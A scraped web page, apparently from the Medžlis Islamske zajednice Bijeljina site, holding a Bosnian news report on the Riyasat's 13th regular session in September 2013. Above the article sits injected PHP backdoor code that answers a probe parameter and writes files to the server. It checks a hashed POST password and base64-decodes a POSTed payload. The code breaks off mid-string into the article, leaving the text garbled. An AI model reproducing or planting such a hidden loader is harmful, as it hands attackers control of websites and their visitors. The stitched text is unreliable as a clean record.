function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" 13. redovna sjednica Rijaseta - Medžlis Islamske zajednice Bijeljina

13. redovna sjednica Rijaseta

13. redovna sjednica Rijaseta

Sarajevo, 18. septembar 2013. (MINA) – Rijaset je informiran o aktivnostima u vezi potpisivanja ugovora sa državom i razgovorima o kompleksu Gazzaz te dao saglasnosti za kupovinu objekta za potrebe škole u Bijeljini i na odluku o imenovanju direktora Instituta za proučavanje tradicije Bošnjaka.

Rijaset Islamske zajednice u Bosni i Hercegovini, pod predsjedavanjem reisu-l-uleme Husein ef. Kavazovića, 17. septembra 2013. godine održao je u Sarajevu 13. redovnu sjednicu. Sjednici su pored muftija i članova Rijaseta, prisustvovali predsjednik Sabora Islamske zajednice Safet Softić i predsjednik Udruženja ilmijje Islamske zajednice Mensur ef. Pašalić.

Rijaset je razmatrao i usvojio ramazanske izvještaje muftija i rukovodioca Ureda za bošnjačku dijasporu. Planirane ramazanske aktivnosti Islamske zajednice su u najvećoj mjeri realizirane, a u izvještajima muftija istaknuto je veliko prisustvo vjernika, posebno mladih, na teravih i noćnim namazima. Značajan broj uposlenika Islamske zajednice i muderrisa posjetili su tokom ramazana džemate širom Bosne i Hercegovine i dijaspore, a posebno je istaknut značaj organiziranja iftara na mjestu Aladže džamije u Foči, za koju se vrše pripreme radi početka radova na njenoj obnovi. Sa žaljenjem konstatirajući da ni ovaj ramazan nije prošao bez incidenata i provokacija, Rijaset je još jednom osudio sve napade na vjernike, a posebno napad na vjernike u Zvorniku prilikom odlaska na bajram-namaz. U raspravi je ukazano na teškoće u radu bošnjačkih džemata na Kosovu i Makedoniji i zaključeno da im se pruži potrebna podrška, osobito u distribuciji vjerske literature. Reisu-l-ulema Husein ef. Kavazović izrazio je zadovoljstvo ukupno realiziranim ramazanskim aktivnostima Islamske zajednice, ističući važnost onoga što je urađeno oko popisa stanovništva, te iskazao zahvalnost svim muslimanima i muslimankama na povjerenju koje imaju prema Islamskoj zajednici.

Na sjednici je zaključeno da je za Rijaset Islamske zajednice neprihvatljivo da se danas u BiH Bošnjacima osporava pravo na nacionalnu grupu predmeta, posebno na izučavanje bosanskog jezika. Rijaset traži od svih nadležnih državnih organa i predstavnika međunarodne zajednice da se učenicima Bošnjacima omogući njihovo ustavno pravo na nacionalnu grupu predmeta u školama.

Rukovodilac Ureda za zekat izvijestio je Rijaset o sprovedenim aktivnostima koje se tiču zekata i sadekatu-l-fitra. Istaknuto je da je povećanje prikupljenog iznosa zekata i sadekatu-l-fitra pokazatelj povjerenja koje Islamska zajednica uživa među muslimanima. Rijaset Islamske zajednice je izrazio zadovoljstvo i priznanje svim muslimanima i muslimankama koji su izvršili vjersku dužnost i propis zekata i sadekatu-l-fitra.

Rijaset Islamske zajednice razmatrao je informaciju o organizaciji hadža u 2013. godini u svjetlu činjenice da je zemlja domaćin ove godine smanjila kvote broja hadžija za sve zemlje te je istaknuto da je Ured za hadž izvršio sve potrebne pripreme u skladu s predviđenim procedurama. Muftija mostarski Seid ef. Smajkić je imenovan glavnim vodičem hadžija iz Bosne i Hercegovine.

Članovima Rijaseta je prezentirana informacija o posjeti delegacije Islamske zajednice Republici Turskoj i razgovorima o zajedničkom interesu za povratkom jedinstva Islamske zajednice u Srbiji. Rijaset Islamske zajednice, izražavajući zabrinutost za stanje među muslimanima u Srbiji, je naglasio da je Islamska zajednica u Srbiji organski dio Islamske zajednice u Bosni i Hercegovini zbog čega Rijaset izražava trajni interes i opredjeljenje za očuvanje jedinstva Zajednice muslimana na tom području. Rijaset Islamske zajednice je ponovio da je Sporazum iz Ankare od 10. oktobra 2011. godine, kako ga je odobrio Sabor Islamske zajednice u BiH, osnova za povratak jedinstva IZ u Srbiji, te da je formiranje novih vjerskih zajednica ili očuvanje nelegalnih neprihvatljivo rješenje.

Rijaset Islamske zajednice je dao punu podršku reisu-l-ulemi za formiranje Radne grupe za razgovore u cilju povratka jedinstva Islamske zajednice u Srbiji, koja će po obavljenom zadatku podnijeti izvještaj reisu-l-ulemi i Rijasetu. Odajući priznanje Dijanetu (Upravi za vjerske poslove) Republike Turske na podršci u traženju rješenja za teškoće na području Islamske zajednice u Srbiji, Rijaset Islamske zajednice je donio zaključak kojim se ističe da reisu-l-ulema, postupajući po svojim ovlastima i u skladu s Ustavom IZ, ne može biti limitiran stavovima nižih organa Islamske zajednice. Također Rijaset Islamske zajednice je iskazao priznanje na uspjesima koje je postigla IZ u Srbiji na čelu sa svojim rukovodstvom i zatražio od Mešihata i Sabora IZ u Srbiji da daju svoj puni doprinos povratku jedinstva IZ u Srbiji.

U nastavku sjednice Rijaset je donio odluku o dodjeli finansijske pomoći medžlisima u stanju finansijske potrebe i odluku o formiranju Komisije za izradu platforme za odnose s organizacijama islamskog određenja. Također je usvojen Pravilnik o stipendijama, usvojene su izmjene i dopune Nastavnog plana i programa za medrese, prihvaćeni su prijedlozi Vakufske direkcije o novim uvakufljenjima i formiranju vakufskog razvojnog fonda, zatim plan aktivnosti za obilježavanje jubileja Glasnika, El-Kalema i Preporoda te informacija o organizaciji klanja kurbana. Rijaset je informiran o aktivnostima u vezi potpisivanja ugovora sa državom i razgovorima o kompleksu Gazzaz te dao saglasnosti za kupovinu objekta za potrebe škole u Bijeljini i na odluku o imenovanju direktora Instituta za proučavanje tradicije Bošnjaka.

Reisu-l-ulema Husein ef. Kavazović je u ime Rijaseta odao priznanje i iskazao zahvalnost muftiji ljubljanskom dr. Nedžadu Grabusu i njegovim saradnicima na vođenju poslova koji su rezultirali velikim uspjehom polaganja kamena temeljca za Islamski centar i džamiju u Ljubljani, saopćeno je iz Ureda za odnose s javnošću Rijaseta.